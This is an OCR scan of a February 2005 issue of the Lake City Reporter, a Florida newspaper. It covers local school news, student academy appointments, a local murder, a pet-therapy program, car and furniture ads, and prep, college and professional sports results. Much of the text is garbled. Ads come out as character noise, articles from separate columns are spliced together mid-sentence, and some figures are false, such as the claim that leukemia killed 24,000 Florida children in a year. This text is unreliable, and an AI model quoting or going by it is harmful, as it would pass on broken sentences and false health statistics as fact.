w0 E map f. ft> E U' COURTESY PHOTO Danny Owens, assistant principal (left), Raymond Macatee (right), Steve. Hentzelman, Band Director (right). Students in AB order, - Charley Civis, Sarah Dooley, Alyssia Freeman, Shaquille Jones, Bobby McNeil, Trey Regar and Jonathan Sheider. 'Raymond Macatee has.sin- gle-handedly donated 204 wind instruments, valued at approximately $175,000 and two equipment trailers valued at $5,000 to the secondary schools' band programs in the Columbia County School System. His business partner- ship project is called "Scrap to Music." Ray is not a wealthy man so where does he get the money? From people who donate scrap metal, which he sells and buys instruments for students who need them. His motto: "We provide musical instruments for kids who can't afford them." Raymond said. He also donated $1,700 to the elementary chorus pro- grams, and in 1995 began a $2,500 music scholarship at Lake City Community College. The driving force behind Raymond Macatee is summed up in the following quote: 'True happiness comes only to those who dedicate their lives to the service of others."' This is Raymond's main pur- pose in life. Eastside Elementary For the second consecutive year, Eastside is participating in the "School and Youth Program" for the North Florida Leukemia and Lymphoma .Society. It is important for children to learn that one person can make a difference. School and SYouth involves students, their families and the community in raising funds to research cures and help families with children who have blood can- cers leukemia, lymphoma, Hodgkin's disease and myelo- ,ma. 'Last year, Leukemia took the lives of 24,000 children in the state of Florida alone and it is predicted that this year another 10,000 children will be diagnosed with this dis- ease. Leukemia is the No. '1 killer of children and young adults ages birth to age 20., Eastside is raising the money in the memory .of Jeffrey Allen Zimmerman. Our goals are: i To help the children and, families who have this d i s e a s e To be No. 1 in the district so our school can receive the '- Radio Disney Party. To raise at least $2,000. Last year the goal was $2,000 and with the help of students, friends, neighbors and busi- - -.d m - nesses. The school raised a little over $3,000 and came in fourth in. the district. If you would like to help us you can send your donation (Please make checks payable to the Leukemia and Lymphoma Society) to: Eastside Elementary c/o Betty Radcliff 256 S.E. Beech Street Lake City, FL 32025 Fort White Elementary Fort White Elementary is proud to be hosting its annual Family Reading Night, Thursday. A book fair will be held in the Media Center from 4:30- 8 p.m. The PTO meeting will be held at 7 p.m. in the auditorium. Guest read- ers will be on hand to make this an enjoyable event. Refreshments will also be served. The School Advisory Council Meeting will be held at 6 p.m. in Amy Martin's room. Melrose Park Elementary Melrose Park is working hard on their attendance. The school would like to com- mend the following, classes for having 100 percent in, attendance with no tardies this past week: Ms. Smithy, Ms. Moseley, Ms. Gwynn, Ms.,-Kamback, Ms. Johns, NMs. McAdams, Ms. Lawrence and Ms. Ward. Every Friday is. Spirit Day at Melrose Park. Several classes showed their spirit. These students had red and white shirts. The classes who received ,th spirit stick on Friday. were: Mrs.-Weaver, Miss Smith, Mrs. Domingue, Mrs. Miller, Mrs. Lawrence and I\i s. S. ill.i.\. Mrs. Smith's third-grade class wrote pen pal letters to a 'third-grade class in Dubai, UAE. If you would like to find this find this city on the map, you will need to look for Saudi Arabia. Mrs. Smith's sister-in- law is a third-grade teacher in this. city. They are sending their pictures via e-mail. This is a fun way to use technology in the classroom. Mrs. Wilkinson's. fifth- grade class ate their math. Yes, you heard right. They ate their math lesson. They learned how to show equiva- lent fractions using a Hershey's chocolate bar. The students learned to show how one half equals six- twelfths. Two at a time, the class ate their candy bar, each time using the remainder of the pieces to construct many equivalent fractions. It was a "sweet" lesson and chocolate loads of fun while learning an important lesson. The yearbook has been completed for this school year and sent off for production. Mrs. Wilkinson would like to extend a huge thank you to Mrs. Dempsey and' .Mrs. Gaylord for their outstanding help. Mrs. Dempsey helped construct some pages along with Mrs., Gaylord. On top of that, Mrs. Gaylord helped by' .taking several of the pictures and laying many pages out on her home computer. Thanks to these ladies for helping Mrs. Wilkinson meet her deadline. Stay tuned to find out when this'Summers tradi- tion will be available for pur- chase. Westside Elementary Mrs. Busch's fifth-grade classroom recently participat- ed in a peace project contest. Her students were able to show off their artistic talents and originality. The work of the class really .paid off. The TRTIA Peace Organization recently awarded them with a' check., for $150. Congratulations, class. Epiphany Catholic Epiphany's 2005 Think Sharp team members are Savannah Bowdoin, Casey Kemp, Nigel Merrick, JoAnne Ortiz and Jean Saltivan, the alternate is Jacob Foster. Epiphany students partici- pated in many events in cele- brations of Catholic) Schools Week. The students brought in donations to purchase blan- kets to donate to Catholic Charities. The total amount donated by the students was $200. Students also. brought in fruit to create fruit baskets for Willowbrook ALF and for Avalon. Epiphany's Student Council sold Valentine Grams to stu- dents. All the proceeds from this project will be donated to Catholic Relief Services to benefit the Tsunami victims. Epiphany Lady' Eagles Softball team are preparing for another season. The stu- dents on the 2005 team are Megan Hill,! Arielle Eagle, Chelsey Kahlich, Heather Edehfield, Tiaiia 'Wright, Gabby. Amparo-Anderson, Holly, Crumpton, Julia Stoddard, Taiyuki St. Louis, Gabby Timmerman, JoAnne Ortiz, Jean Saltivan, Holly Saitta, Savannah Bowdoin, Ruth Ruis and Halley Zwanka. The team is lead by Coach Dave Ross and Assistant )Coach Linda Hill., Fort White High Who says reading doesn't say? Ask the 140 students that ranged from ninth to 12th- grade from Fort White High. m *;^ a s -- *Am Fort White High School stu- dents' enjoy pizza at the AR Pizza Party. (From left) Zach Egan, Megan Wilson, Matt Case, Ben Anderson, Justin Doris, Rachael Register, Connor Hayden and Ryan Walters. They were treated to an Accelerated Reader pizza party for their hard work on Feb. 3. The requirements for this party were the completion of all three books, six reading logs and a score of 60 or high- er on their ,AR tests for the third six weeks. The party consisted of 30 pizzas and plenty of soda to go around. It was held in the school's cafete- ria and lasted about 45 min- utes. This party was made pos- sible by the generous donation from the school's library and the SAC committee. Bryan K. Taylor is a 2005 senior at Fort White High. He is 18 years old and has been "wr.. ^.JSS .^ k" COURTESY PHOTO Brian Singleton and Bryan Taylor accepted to the United States Air Force in Colorado Springs, Colorado. He was nominated by Congressman Ander Crenshaw. Bryan will be an Officer and go to pilot school. He is one of 1,200 cadets in the class of 2005. Only 15 percent of applicants are offered an appointment to the Academy. There he will major in Aeronautical Engineering, and will minor in a Foreign Language, proba- bly German. Bryan will be leaving on June 28 and will attend basic training over the summer. In August, classes will begin and he will have a very structured day. The govern- ment pays for his education upon graduation. His extracurricular activi- ties include playing soccer, volunteering and Boy Scouts in Troop 85 located in Lake City. Bryan says he owes everything to his parents, Chuck and Debra Roberts and Leslie Taylor, his grand- parents, siblings and friends. Thank you all for the support. Brian Moses Singleton is a 2005 senior at Fort White High School. He is 18 years old and has earned, two scholarships, one from Bright futures and UF Presidential Scholarship. He has been accepted and plans to attend, the University of Florida in the fall of 2005. Brian plans to major in Civil Engineering and will be attending the step-up pro- gram over the summer, which is a preparation program for minority engineering stu- dents. Brian says when he was young he wanted to be a con- struction worker, which changed into an architect, which made him interested in engineering. He's also inter- ested in Real Estate and Land Development. His extracurricular activi- ties include hanging out with friends, going to the movies, the mall, games, and out to eat. He plans on keeping in touch with all his friends and family. Brian is very excited about starting his career. CAMPUS CALENDAR Tuesday U FWHS Indian JV/V Softball at Chiefland 5/7 p.m.; Indian V Baseball at "- Union County 7 p.m. Wednesday -. ( CCE Volunteer Brunch. -. in cafeteria 8:15'a.m. . .. Five Points Elementary Volunteer Appreciation Melrose Park Elementary PAWS Reading Dogs Program Thursday FWHS Indian Baseball fund-raiser Staff Breakfast in Hastings' Room 7:45 9 a.m; Middle School Dance in cafeteria 3:30- 6:30 p.m. Fort White Elementary Family Reading Night 4:30 - 8 p.m.; School Advisory Council (SAC) meeting 6 p.m.; PTO meeting Niblack Elementary - Readers Theater; Doughnuts for Dads and Muffins for Moms Reading Breakfast in Media Center 7:30 a.m. , Summers Elementary - Volunteer Appreciation reception at 9:30 a.m.; Pre-K classes to downtown Lake City for tour of fire station, police station, post office and Tucker's Restaurant Friday Teacher Workday/ Student Holiday Summers Elementary Chorus will sing at Olustee Festival. Foi i 00l FIRST FEDERAL SAVINGS BANK of FLORIDA r our community, our kids, our future... First Federal Savings Bank of Florida proudly sponsors Newspaper in Education Alp NATION & WORLD ____ lb~~~%t %bl ahm qMw -d "Copyrighted Materiald Syndicated Content Available from Commercial News Providers" - a AM- -*4 DERMATOLOGY BY ANTHONY AULISIO, M.D. Board Certifiea Dermatologist IT JUST ISN'T FAIR If you think that the deadliest form of skin cancer, known as melanoma, just poses a threat to fair- skinned people, be advised that it is even deadlier for African- Americans. This may be partly due to the fact that few dark-skinned people expect it. The fact is that nearly two-thirds of melanomas among African-Americans occur in areas of the body that get little sun exposure, including the feet, palms, and toenails. Other areas that may unexpectedly be the site of melanoma are the inside of the mouth and nose. With this in mind, if you see a suspicious lesion on your body, bring it to the immediate attention of a dermatologist. With early intervention, melanoma has a 95% cure rate. If you would like further information aboqt melanoma, or need to have your skin evaluated for a possible case of cancer, don't hesitate and contact GAINESVILLE DERMATOLOGY & SKIN SUR- GERY at 332-4442 to schedule an appointment. Our office is conveniently located at 114 N.W. 76"' Drive. We are accepting new patients. P.S. African-Americans should examine their skin, from head to toe, monthly, looking for deep-black spots on the skin and deep-black streaks on nails. PW, PL, Tilt, Auto, Advanced Triac, AC Was $28,905 w 22,995 SAVE n2 7$ 3 9 ux r P c s '4 Lincoln Aviator '05 Mercury Grand Marquis GS 2005 Lincoln LS Amterica Onl Rear Wheel Drive Sedan 45 34,995 18,450 Wa 26,880 After all rebanto in line of snaria l APR finna, r. h ImI..... cn D..Inc k ... .. O.ld- .i r .. loaded Was $34 2-.:5 SAVE 12,000 '^aaZa9s '05 Mercury Mountaineer '05 Lincoln Town Car Was $33,55026550 Was $42,570 s34,570 Leather, CD Changer, Loaded, AC Was s22,795 = s20,795 W N '**.l -.. : :. : * "05 Ford F-150 IC. Rad edes '05 Ford F-150 Supercrew Lariat 4x4 599. -a. 3 ,1915 0 .15,.. ____3 Brand New Lincoln Navigator kage. .Ilounronl/. If ------ ..- -conques t rebate~L, Plus Tax, Tag, ITitl adfl$249Q.95 AMIJIfee. -I e-Mt C0 F dIW -V C10 5 :D -6e -X 7-ertified I r COO =.I I it re mm LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 10A . e Now %Moslem= '55 MUSTANG CTMPE Janin:ml, Z'ter. aws/Locks Cruise sol --- --- --- -- -- -- P-3 1 5 LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 (I - j- dL ouwt wtor uimor lkut lm,'s,. "Copyrighted Material Syndicated Content Available from Commercial News Providers" PETS- Continued from page 1A favor of pet therapy and cited documented evidence to sup- port its benefits. Hayden said medical stud- ies have shown "people who have pets at home live longer and. healthier than people who don't." If patients welcome pet therapy dogs, he said their presence can only be benefi- cial. "It's got my vote," he said. "When you look at the evi- dence, it's hard to argue the facts." Wisner said by working with North Florida Paws to offer the training, more local dogs with easy-going, kind temperaments can be certi- fied as pet therapy dogs. While the service will be offered at the medical center at least twice a month for now, she said she hopes the fre- quency will soon increase as more dogs receive training and certification. Wisner said a miniature schnauzer is also expected to start making pet therapy vis- MURDER Continued from page 1A .__._..detention -center in seven months. The time of his murder was later established on Jan. 18 at about 9-10 p.m., just hours after ACADEMY Continued from page 1A academy. "At. the beginning, it was kind of just an idea," he said. "It's been a dream since about ninth grade. It was like a roller coaster ... there was so much paperwork, but in the end I figured if it was meant to be, I would get in." Taylor learned he received his appointment on Jan. 28 when the confirmation came from U.S. Rep. Ander Crenshaw's office. "I was honored to be able to nominate this outstanding young man. I am especially, pleased he has received this appointment." stated Crenshaw in a press release. "Bryan has already proven to be an exceptional student, ath- lete and leader. I am confident he will serve our nation with great dedication and valor." "That's a telephone call I will never forget," Taylor said. 'They called.me right before soccer and I played a really good game that night, but I didn't get to score." While attending the Air Force Academy, Taylor said he plans to major in aeronauti- cal engineering and after he graduates, he plans to go to pilot flight training. In the meantime though, he's ready to make a trip to. Colorado Springs to visit the Air Force Academy. "Right now I'm just anxious and ready to go," he said. '"There is an orientation that I'm going to in April for two days." Bryan is the son of Chuck and Debra Roberts of Lake City and Leslie Taylor of Lake City. According to reports, all graduating high school sen- iors interested in attending a U.S. service academy must go through an extensive nomi- nating process. All applicants are required to complete an application, write an essay, and participate in interviews by a committee of community leaders and retired military officers. JUSTIN LANG/La ke City Reporter Certified pet therapy dog Pepi McClead, a Papillon, with Columbia County Senior Services, gets ready to visit another patient at the Lake City Medical Center Monday. its to the medical center by next week. For patient Linda Sirota of Wellborn, herself a dog owner, it was nice to have Pepi brighten her time at the he had been released from jail. According to his arrest report, Razor was homeless and had a South Carolina dri- ver's license. Police have said he left jail \with a wallet and received Sln, from a friend later in the day, but neither have been found. medical center Monday. "I love animals and I think anybody who is sick, if they have an animal coming, in (their room), it just makes them feel better." Few other details have been released so far about Razor or his criminal and personal histo- ry. The murder is Lake City's first in three years, the last being the shooting death of John Michael Thomas on Dec. 9, .2001, .That case, remains, unsolved. Has your water treatment system been checked lately? A professionally trained Culligan Water Erpert will come lo your home and inspect, adjusi and crieck your waler system. Inspect 'n' Check Special Any Make or Model Limited 9 Time Otter!$1- &^ fl Call Your Culligan Waler Specialist Today I 1-800-233-2063 , ..i.rl. lllll. ilu ],, jhi .I.. .n n,,l |I" i, h: ll, ,,,,,, ,. ,,,] ,. ,,'n i.,n l <'.l i ti i[, jh,,,, iTl,, J, r,', l L , O 0I O".u "? .J Choose any Culligan Water I *. Softener or Conditioner and =I Take Advantage of this Low I| Introductory Offer 3 B 1PER MONTH For the first 3 months Call Your Culligan Water Specialist Today CA TOLL FREE SWater 1-800-233-2063 161 1 C, 1 1 p 'C- A- r----'-------- ------I- i Purchase any Culligan'" Water Conditioning System and Receive a I FREE. DRINKING WATER SYSTEM I I I I I I I .1 Eu I I I Call Your Culligan Water Specialist Today In o TOLL FREE I SIsVater" 1 -800-233-2063' I I-I'T"I ". ': 'n .. .. '" .- : .."1*n" a '.j"i'. ni. l'l .'l ..' ...," "*..I.-"'.1.l ." ." : ."' -'1. 1 | I .- .li:, = h,.,...,,i, fj.'l i,] .lr. ,r:, "(.,.I : .,.,a-,.,.. ....,h. I .:,I ....i,. _.y,," L-.-.---- ---.---- CALL TODAY! We have a plan that will fit your needs and budget. J ) 0 U800-233-2063 Q Is Water \ Complete Service on Everything We Sell FREE SALT DELIVERY FREE WATER ANALYSIS trao Gua)d HOU ie'Npirir| i6 jprl ; I 0 li l a irer *nr, vitrm 1 a1.'i-: ' liIl-ie ,irir diil'nrg wdar-r ,;y1f-,Ti, Be'l EBuy 1:,i I rily inr.- Goo HIus ping [ U li, G o l d ".5r1,1 E So ile r 'er WAR Continued from page 1A billion was for aid to U.S. allies. Of the total package for the wars, the vast majority - $74.9 billion was for the Defense Department, with other agencies sharing the rest. Some $12 billion was requested to replace or repair worn-out and damaged equip- ment, including $3.3 billion for extra armor for trucks and other protective gear under- scoring eco- nomic development and to help them create democratic institu- tions. One possible flashpoint with Congress was two $200 million, funds the State Department would control to provide eco- nomic and security aid to unspecified U.S. allies. Welcome to A total of $950 million would be provided for the tsunami- damaged Indian Ocean coun- tries, largely for relief and long- term reconstruction. Also requested was $242 mil- lion for aid for Sudan's war-rav- aged Darfur region. that seemed to have little to do with the war and should have been in Bush's overall budget released last week. Painter's A Timeworn Brush of Fashion a,. ~ ..,~j ~.v'. K Shed Imagine aaLIci lded V -c - and li natlk ivlepatrcd vthe died There it corriniiCdlo SCv'\t ai :1 A1 *v'k -Al'1rlLC I t:Lc rc.. ucd b.,- nL c.'. P- L IiatC C[l[ Lthatt'aLHCl C.[L- petso nalicy and har,atr l*of *Broyhill Four Timeworn Finishes: gathereded Almond Scrubbed Olive Smokey Steel Brick Ivorv ieridqe Furniture 1052 SW MAIN BLVD. Fine Furniture, Accessories and Design for over 30 years. 752-2752 ilitl il~l lijj i~kT Italian Leather by Soft Line , 2 styles, 6 colors to choose from SofaS............. regularly 1,199 Now Only.... $899 Love Seats...regularly 1,149 Now Only..... 799 ALL OTHER LEATHER IN STOCK ON SALE! r ------------------------------------ AlLLamps west Ticketed Price " a0II. I % 0 Bedroom, SI I Lividg vroom ~[ &. Accessories! [ .& Dining Room -*No rainche-ks, no special orders. Discount on in stock merchandise only *No rainchecks, no special orders. Discount on in stock merchandise only 90 Dys ameAsC l v 1429 N. Ohio Ave. North (old Food Lion Building) Live Oak (y 386.364 .1 15 11A I . 60"'T 0% Y--I 12A LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 WORLD ____ ____________ "Copyrighted Material -- Syndicated Content-,- Available from Commercial News Providers" iruqi h ump. d pr a . a 4 Bayway Carpet & Upholste Residential & Commercial Lake City Live Oak 755-6142 362-2244 ery GUESS WHAT! JUST FOUND.. 'ANY 3 ROOMS " $6900* *Max. 300 sq. ft. per room. LRDR, combo count as 2. Residential only. 6 0Expires 2-28-05 Sofa & Chair Cleaned S8 Soft up to7'. Some fabrics Slightly higher. $8, ,5 Expire2-28-05-J SHall Free with 3 iRooms or more cleaned 11 - - - - ul P quality Tire & Brake S Complete Auto Care Center 1-75 & Exit 414, Ellisville 755-9999 FREE ESTIMATES = C. iX. OIL CHANGE "'FILTER TIRE BALANCE & ROTATION FREE $A95 $195 BRAKE 1391,, i. INSPECTION The Orhopaeic.Ont/O'l/ Edward J. Sambey, M.D. Sports Medicine Non-Surgical Orthopaedics Occupational Medicine Workers' Compensation & Most Insurance Plans Accepted 3 (386) 755-9215 S1 888-860-7050 (Toll Free) Im eiteApinmns / 'al -in -atens 0Acete S - A ft ---------------------- ma LAKE ITY REPORT Section B Tuesday, February 15, 2005 Lake City, Florida Scoreboard 2B Comics 3B Classified 4B FOOTBALL Fowler agrees to buy Vikings MINNEAPOLIS -. Asked about becoming the league's first black owner, Fowler said Monday in a seeming contradiction that he thought it was "a great thing" and not that big a thing. He said race didn't figure in negotiations with McCombs. NFL owners are to meet March 20-23 in Hawaii. League rules require 24 of the 32 owners to approve a sale. The NFL also man- dates that a general partner must put down 30 percent of the cash portion of any franchise purchase. BASEBALL Canseco's book is a hit NEW YORK Jose Canseco's autobiography accusing several top players of steroid use and charging that baseball long ignored performance-enhancing drugs appeared to be a hit on its first day in bookstores. Amazon.com listed "Juiced: Wild Times, Rampant 'Roids, Smash Hits, aid How Baseball'Got Big" as third on its best seller list Monday. Mark McGwire, one of the former teammates Canseco accused of using steroids, issued a written denial. ''The relationship that these allegations por- tray couldn't be further from the truth," McGwire's statement said. In the book, Canseco is an unabashed advocate of performance-enhancing drugs. Compiled from Associated Press reports. Prep schedule TODAY * Columbia High softball at Baker County High, 6 p.m. (JV-4). * Fort White High softball at Chiefland High, 7 p.m. (JV-5) * Columbia High baseball at Suwannee High, 7 p.m. * Fort White High boys basketball vs. Bradford High in the District 4-3A tournament at Santa Fe High, 7:30 p.m. WEDNESDAY * Columbia High tennis vs. Forest High, 4 p.m. * LCCC baseball at Polk CC, 5 p.m. * Columbia High boys basketball vs. Paxon School in the District 6-4A tournament at Fleming Island High, 6 p.m. THURSDAY * LCCC baseball vs. North Florida CC, 2:30 p.m. * Columbia High boys tennis vs. Buchholz High, 3:45 p.m. * Fort White High softball vs. Union County High, 7 p.m. (JV-5) FRIDAY * Columbia High tennis at Baker County High, 3 p.m. * Columbia High baseball at Madison County High, 4 p.m. * Fort White High softball at Bradford High, 7 p.m. (JV-5) * Columbia High softball vs. Fleming Island High, 7 p.m. S(JV-5) SATURDAY * Columbia High wrestling in Region 1-2A tournament at Crestview High, Noon SUNDAY * LCCC baseball at Pasco- Hernando CC, 2 p.m. Jamit -~t IaItmyt- 50- *a 4 S.'- "Copyrighted Material _ S Syndicated Content Available from Commercial News Providers"' VAWe - - ~ - 0 First step Columbia is No. seed at district By TIM KIRBY tkirby@lakecityreporter. com Columbia High basketball enters the District 6-4A tour- nament, as the No. 2 seed. While the Tigers lost out on a first-round bye, their half of the bracket may be better. Columbia, (17-8) plays Paxon School at 6 p.m. Wednesday. Other opening- round games are No. 3 Lee High vs. No. 6 Middleburg at 4 p.m. and No. 4 Forrest High vs. No. 5 Fleming Island High at 8 p.m. Fleming Island is hosting the tournament. Top seed Ridgeview plays the Forrest/Fleming Island winner at 8 p.m. Friday. Columbia's semifinal oppo- nent would be the Lee/Middleburg winner at 6 p.m. The district final is 7:30 p.m. Saturday. "One of those two (Ridgeview, Forrest) will not make the playoffs, and they are two pretty good teams," CHS head coach Trey Hosford said. "Even though we got the No. .2 seed, I like our draw." . Columbia found out last year being a higher seed does not guarantee success. "Going into the tourna- ment, we've got some guys who have been there and tast- ed defeat early," Hosford said. CHS continued on page 2B TIM KIRBY/Lake City Reporter Columbia High basketball coach Trey Hosford (front) and starters Alvin Bradley, Justin Rayford, Byron Shemwell, Kendric Williams and Antwan Julks (from left) watch the introduction of the opponents at a recent game. Indians look to play spoilers MARId SARMENTO/Lake Citty Reporter Fort White High players receive instructions from coach Charles Moore (center). By MARIO SARMENTO msarmento@lakecityreporter.com The Fort White High boys basketball team is seeded sixth entering tonight's open- ing game of the District 4-3A tournament, but Charles Moore is expecting a battle. "I feel confident that we can go in and pull off a big upset," Moore said. The Indians face No. 3 seed Bradford High today at 7:30 p.m. in the second game at Santa Fe High. Fourth-seeded Interlachen High takes on fifth-seeded Keystone Heights High in the first game of the night at 5 p.m. Top seed Santa Fe and No. 2 seed Union County High have byes in the opening round. Bradford swept both meet- ings from the Indians this sea- son, 64-46 on Jan. 13 and 87-77 at home on Feb. 1, but Moore thinks the latter meeting may be more indicative of how tonight's game will go. "We didn't play them that tough when we went to their place," Moore said. "But we played them real tough when HOOPS continued on page 2B Timberwolves win with Clark juggling lineup By TIM KIRBY tkirby@lakecityreporter. corn Lake City Community College's baseball returned the favor to Darton College, beating the Albany, Ga., school 6-2 on its home field Sunday. Darton knocked off the'Timberwolves in Lake City on Saturday. Lake City jumped out with three runs in the first inning. Stephen Barnes allowed one hit through five innings, but Darton scored two unearned runs in the fourth. Lake City got one run back in the fifth inning and added a pair of insurance runs in the sixth. The only hit off Barnes was a bloop single in the fifth inning, but he helped shoot himself in the foot in the fourth inning by making two of three consec- utive errors by LCCC. A hit batter sent in one run and another scored on a sacrifice fly. Barnes, who struck out five and walked one in improving to 2-1, left with a blister in the sixth inning. Raleigh Evans relieved with a 2-0 count and struck out the batter. He went four innings with two hits, two . walks and five strikeouts to get the save. "Raleigh was scheduled to start on Wednesday, but I thought we needed a win," LCCC head coach Tom Clark said. Lake City's first-inning rally came with two outs. Chris Petrie doubled, and Brandon Hall scored him with a single. Mark Davis singled and Augustin Montanez drove in both runs with a double. In the fifth inning, Petrie singled and was forced by Davis. Walks to Montanez, Stephen Rassel and Travis Jones produced the run. In the sixth inning, both Matt Dallas and. Petrie singled and stole second. Hall brought them home with a double. Dallas, who was moved to the lead- off spot, had two hits. Petrie had three hits, including two off lefties. Luis Sanchez also singled for the 'Wolves. 'We had no hits in the last three innings and that is a minus for us with the way the bullpen's pitching," Clark said. "On Saturday, we did not score any runs from the seventh to the 10th inning." Catcher Hall has been injured and relegated to DH. That has moved Davis to first, Rassel to left field the third position he has played this sea- son, Jones to center field and Avery Johnson, who has been struggling at the plate, out of the lineup. "Petrie, Hall, Davis and Dallas are coming on pretty strong and Montanez is starting to hit," Clark said. "Our other catchers are doing a good job defensively, but they do not have a hit. I like to hit up and down the tj lineup and we are not doing that right now." The 'Wolves play at Polk Community College at 5 p.m. Wednesday. Brian Schlitter will start, if he is recovered from being hit by a line drive on Friday. North Florida Community College visits Thursday for a 2:30 p.m. game and will face Duente Heath. Barnes will return to the mound Sunday for a 2 p.m. road game at Pasco-Hernando Community College. Lady Timberwolves softball Lake City Community College's softball team won one of three games at the Triple Crown Classic in St. Augustine over the weekend. Lake City fell to Hillsborough 4-1, despite a two-hitter thrown by Jenna LCCC continued on page 2B to state LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 SCOREBOARD TELEVISION TV sports Today MEN'S COLLEGE BASKETBALL 7 p.m. ESPN Indiana at Ohio St. ESPN2 Connecticut at Providence 9 p.m. ESPN Ki ni .'l., .11 ..,,uli Carolina NBA 8 p.m. NBA TV New Jersey at Minnesota SOCCER 2:5 p.m. ESPN2 Exhibithio, FIFA/UEFA, Football for HIapte, Shevehenka XI vs, Ronaldinho XL, at Bsrdonla, Sulan Pro Bowl At Honolulu NFC 0 10 14 3 27 AFC 14 14 0 10 38 First Quarter AFC-Harrison 62 pass from Manning (Vinatieri kick), 8:33. AFC-Ward 41 pass from Manning (Vinatieri kick), 2:49. Second Quarter NFC-Westbrook 12 run (Akers kick), 12:09. AFC-Ward 39 kick return (Vinatieri kick), 12:01. AFC-Gates 12 pass from Manning (Vinatieri kick), 5:50. NFC-FG Akers 33, 1:41. Third Quarter NFC-Holt 27 pass from Vick (Akers. A-59,225. NFC First downs 26 Total Net Yards 492 Rushes-yards 27-155 Passing 337 Punt Returns 0-0 Kickoff Returns 5-136 Interceptions Ret 1-0 Comp-Att-Int 24-48-3 Sacked-Yards Lost 2-16 Punts 1-59.0 Fumbles-Lost 1-0 Penalties-Yards 3-28 Time of Possession 35:34 AFC .15 343 27-120 223 1-7 6-165 3-5i 12-22-1 2-13 2-42.5 1-1 2-1015. -1.24. \0l : L4-24-1-205, H.1-a '-'.i Aft. M'hr,,ing 6-10-0-130, I r-7e .-. .*'.. r .j1h i l-4:!). AUTO RACING Daytona 500 qualifying Sunday At Daytona International Speedway Daytona Beach (Car number in parentheses) 1. (88) Dale Jarrett, Ford, 188.312 mph. 2. (48) Jimmie Johnson, Chevrolet, 188.170. 3. (24) Jeff Gordon, Chevrolet, 188.155. 4. (29) Kevin Harvick, Chevrolet, 187.915. 5. (01) Joe Nemechek, Chevrolet, 187.837. 6. (10) Scott Riggs, Chevrolet, 187.758. 7. (11) Jason Leffler, Chevrolet, 187.715. 8. (97) Kurt Busch, Ford, 187.699. 9. (21) Ricky Rudd, Ford, 187.414. 10. (38) Elliott Sadler, Ford, 187.398. 11. (36) Boris Said, Chevrolet, 187.122. 12. (45) Kyle Petty, Dodge, 186.974. 13. (23) Mike Skinner, Dodge, 186.753. 14. (16) Greg Biffle, Ford, 186.587. 15. (9) Kasey Kahne, Dodge, 186.501. 16. (5) Kyle Busch, Chevrolet, 186.486. 17. (42) Jamie McMurray, Dodge, 186.397. 18. (14) John Andretti, Ford, 186.324. 19. (31) Jeff Burton, Chevrolet, 186.270. 20. (0) Mike Bliss, Chevrolet, 186.262. 21. (2) Rusty Wallace, Dodge, 186.150. 22. (19) Jeremy Mayfield, Dodge, 186.143. 23. (6) Mark Martin, Ford, 186.123. 24. (18).-Bobby Labonte, Chevrolet, 186.112. 25. (99) Carl Edwards, Ford, 186.047. 26. (4) Mike Wallace, Chevrolet, 185.908. 27. (22) 185.793. 28. (20) 185.701. 29. (12) 185.659. 30. (07) 185.636. Scott Wimmer, Dodge, Tony Stewart, Chevrolet, Ryan Newman, Dodge, Dave Blaney, Chevrolet, 31. (1) Martin Truex Jr., Chevrolet, 185.575. 32. (33) Kerry Earnhardt, Chevrolet, 185.502. 33. (15) Michael Waltrip, Chevrolet, 185.448. 34. (40) Sterling Marlin, Dodge, 185.445. 35. (41) Casey Mears, Dodge, 185.300. 36. (25) Brian Vickers, Chevrolet, 185.239. 37. (49) Ken Schrader, Dodge, 185.109. 38. (7)'Robby Gordon, Chevrolet, 184.911. 39. (8) Dale Earnhardt Jr., Chevrolet, 184.888. 40. (00) Kenny Wallace, Chevrolet, 184.703. 41. (27) Kirk Shelmerdine, Ford, 184.665. 42. (09) Johnny Sauter, Dodge, 184.528. 43. (37) Kevin Lepage, Dodge, 184.400. 44. (66) Hermie Sadler, Ford, 184.211. 45. (73) Eric McClure, Chevrolet, 183.963. 46. (17) Matt Kenseth, Ford, 183.494. 47. (77) Travis Kvapil, Dodge, 183.415. 48. (92) Stanton Barrett, Chevrolet, 183.098. 49. (13) Greg Sacks, Dodge, 183.024. 50. (32) Bobby Hamilton Jr., Chevrolet, 182.990. 51. (89) Morgan Shepherd, Dodge, 182.789: 52. (55) Derrike Cope, Chevrolet, 182.275. 53. (34) Randy LaJoie, Chevrolet, 181.159. 54. (52) Larry Gunselman, Ford, 178.409. 55. (93) Geoffrey Bodine, Chevrolet, 177.085. 56. (80) Andy Belmont, Ford, 174.683. 57. (43) Jeff Green, Dodge, did not finish. ASEETB'I'ALL NBA standings EASTERN CONFERENCE Atlantic Division W L Pct GB Boston 26 26 .500 - Philadelphia 26 26 .500 - New Jersey 22 29 .431 3'1 Toronto 21 31 .404 5 New York 20 32 .385 6 Southeast Division W L Pct GB' Miami 39 14 .736 - Washington 30 20 .600 7%A Orlando 27 24 .529 11 Charlotte 10 39 .204 27 Atlanta 10 39 .204 27 Central Division W L Pct GB Detroit '30 19 .612 - Cleveland 29 20 .592 1 Chicago 24 23 .511 5 Indiana 24 26 .480 6' Milwaukee 20 28 .417 9%' WESTERN CONFERENCE Southwest Division W L Pct GB San Antonio 40 12 .769 - Dallas 33 16 .673 5% Houston 31 21 .596 9 Memphis 30 22 .577 10 New Orleans 10 41 .196 29% Northwest Division W L Pct GB Seattle 35 14 '.714 - Minnesota 25 27 .481 11%' Denver 23 28 .451 13 Portland 21 29 ..420 14%k Utah 17 33 .340 18'% Pacific Division : W L Pct GB Phoenix 40 12 .769 - Sacramento 33 18 .647 6%' LA. Lakers 25 24 .510 13 % LA Clippers 23 28 .451 16'k Golden State 14 37 .275 25k% Sunday's Games Miami 96, San Antonio 92 Chicago 87, Minnesota 83 Cleveland 103, LA. Lakers 89 Sacramento 104, Boston 100 Indiana 76, Memphis 73 Toronto 109, LA Clippers 106 New York 102, Charlotte 99 Orlando 97, New Orleans 94 New Jersey 94, Denver 79 Dallas 95, Seattle 92 Houston 81, Portland 80 Phoenix 106, Golden State 102, OT Monday's Games (Late Games Not Included) Philadelphia 106, New York 105 Portland 80, Charlotte 77 S, MilUvukeeatD.etroit () Washington at New Orleans (n) Utah at Phoenix (n) Today's Games LA Clippers at Orlando, 7 p.m. Denver at Atlanta, 7:30 p.m. New Jersey at Minnesota, 8 p.m. Sacramento at Chicago, 8:30 p.m. Washington at Houston, 8:30 p.m. Utah 